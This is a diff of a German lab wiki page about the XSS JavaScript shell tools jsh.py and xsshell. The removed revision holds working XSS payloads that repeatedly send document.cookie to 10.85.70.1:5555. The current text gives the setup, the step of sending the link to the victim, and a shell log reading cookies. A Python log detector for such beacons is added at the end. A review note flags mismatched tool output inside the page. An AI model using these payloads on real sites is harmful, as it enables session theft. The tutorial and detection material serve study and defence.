Xsshell: Difference between revisions

From Xinux Wiki
Zeile 6: Zeile 6:
  
 
=start=
 
=start=
*./jsh.py -g -p 5555 -s 10.85.70.1
+
*./xsshell -host 127.0.0.1 -port 4444
<pre>
 
    __
 
  |(_  _ |_  _  |  |
 
\_|__)_> | |(/_ |  |
 
                      v3.1
 
  
Payloads:
+
xsshell -h
- SVG: <svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
+
Usage of xsshell:
- SCRIPT: <script>setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)</script>
+
  -cert string
- IMG: <img src=x onerror=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie},1010)>
+
    ssl cert file
- BODY: <body onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//10.85.70.1:5555/?"+document.cookie}></body>
+
  -host string
 +
    websocket listen address
 +
  -key string
 +
    ssl key file
 +
  -log string
 +
    specify a log file to log all console communication
 +
  -path string
 +
    websocket connection path (default "/s")
 +
  -port string
 +
    websocket listen port (default "8234")
 +
  -servdir string
 +
    specify a directory to serve files from. a file server will not be started if no directory is specified
 +
  -servpath string
 +
    specify the base url path that you want to serve files from (default "/static/")
 +
  -wrkdir string
 +
    working directory that will be used as the relative root path for any commands requiring user provided file paths
  
Listening on [any] 5555 for incoming JS shell ...
 
</pre>
 
 
=Payload=
 
=Payload=
 
*Payload muss ins Eingabefeld
 
*Payload muss ins Eingabefeld
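
Review bot: the start line now reads "./xsshell -host 127.0.0.1 -port 4444", but the "Listening on [any] 5555 for incoming JS shell ..." line at the end of the same pre block is jsh.py output for port 5555, so tool and port no longer match within the block. Drop that line or replace it with output captured from xsshell on port 4444. The =Payload= section also still says "Payload muss ins Eingabefeld" although the "Payloads:" list it referred to is removed by this change, so the section should be reworded to say which payload is meant.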

Revision as of 28 July 2021, 12:48

git clone

  • sudo apt-get install golang-go
  • go get github.com/raz-varren/xsshell
  • go install github.com/raz-varren/xsshell

start

  • ./xsshell -host 127.0.0.1 -port 4444

xsshell -h
Usage of xsshell:

 -cert string
   	ssl cert file
 -host string
   	websocket listen address
 -key string
   	ssl key file
 -log string
   	specify a log file to log all console communication
 -path string
   	websocket connection path (default "/s")
 -port string
   	websocket listen port (default "8234")
 -servdir string
   	specify a directory to serve files from. a file server will not be started if no directory is specified
 -servpath string
   	specify the base url path that you want to serve files from (default "/static/")
 -wrkdir string
   	working directory that will be used as the relative root path for any commands requiring user provided file paths

Payload

  • The payload must be entered into the input field
  • The generated link is sent to the victim

The shell

Listening on [any] 5555 for incoming JS shell ...
Got JS shell from [10.85.70.1] port 53146 to orville 5555
>>> var test = 'hacked by xinux'
>>> confirm(test)
>>> prompt(document.cookie)
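
Seen from the defender's side, the payloads listed in the older revision above (a script request to //10.85.70.1:5555/? with document.cookie appended, repeated by setInterval every 1010 ms) leave a regular pattern in proxy logs. The following Python detector is an added example, not part of the wiki page or of either tool; the log format, the host names intranet.example and search.example, and the PHPSESSID cookie name are constructed assumptions.

```python
import re
import statistics
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Constructed proxy log lines: "<epoch_ms> <client_ip> <requested URL>"
SAMPLE_LOG = """\
1627469280000 10.85.70.23 http://10.85.70.1:5555/?PHPSESSID=k3v9s1;%20lang=de
1627469280300 10.85.70.23 http://intranet.example/api/poll?since=17
1627469281010 10.85.70.23 http://10.85.70.1:5555/?PHPSESSID=k3v9s1;%20lang=de
1627469281300 10.85.70.23 http://intranet.example/api/poll?since=18
1627469282022 10.85.70.23 http://10.85.70.1:5555/?PHPSESSID=k3v9s1;%20lang=de
1627469282500 10.85.70.40 http://search.example/?q=xinux&lang=de
1627469283032 10.85.70.23 http://10.85.70.1:5555/?PHPSESSID=k3v9s1;%20lang=de
1627469284040 10.85.70.23 http://10.85.70.1:5555/?PHPSESSID=k3v9s1;%20lang=de
"""

# document.cookie serialises as "name=value; name=value", never with "&"
COOKIE_SHAPED = re.compile(r"^[^=;&\s]+=[^;&]*(; [^=;&\s]+=[^;&]*)*$")

def find_cookie_beacons(log_text, own_hosts, session_cookies,
                        min_hits=4, max_jitter=0.15):
    """Flag clients that repeatedly send a cookie-shaped query string
    containing one of our session cookie names to a foreign host at a
    near-constant interval."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip lines that do not fit the assumed format
        ts, client, url = parts
        target = urlsplit(url)
        query = unquote(target.query)
        if target.hostname in own_hosts or not COOKIE_SHAPED.match(query):
            continue
        names = {pair.split("=", 1)[0] for pair in query.split("; ")}
        if names & set(session_cookies):
            hits[(client, target.netloc)].append(int(ts))
    findings = []
    for (client, dest), times in sorted(hits.items()):
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = statistics.median(gaps)
        if period > 0 and statistics.pstdev(gaps) / period <= max_jitter:
            findings.append({"client": client, "dest": dest,
                             "period_ms": period, "hits": len(times)})
    return findings
```

Call it as find_cookie_beacons(SAMPLE_LOG, {"intranet.example"}, {"PHPSESSID"}); cookies set with the HttpOnly attribute never appear in document.cookie, so they would not show up in such requests at all.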

On the client

Xss-poc-js-sh1.png

Links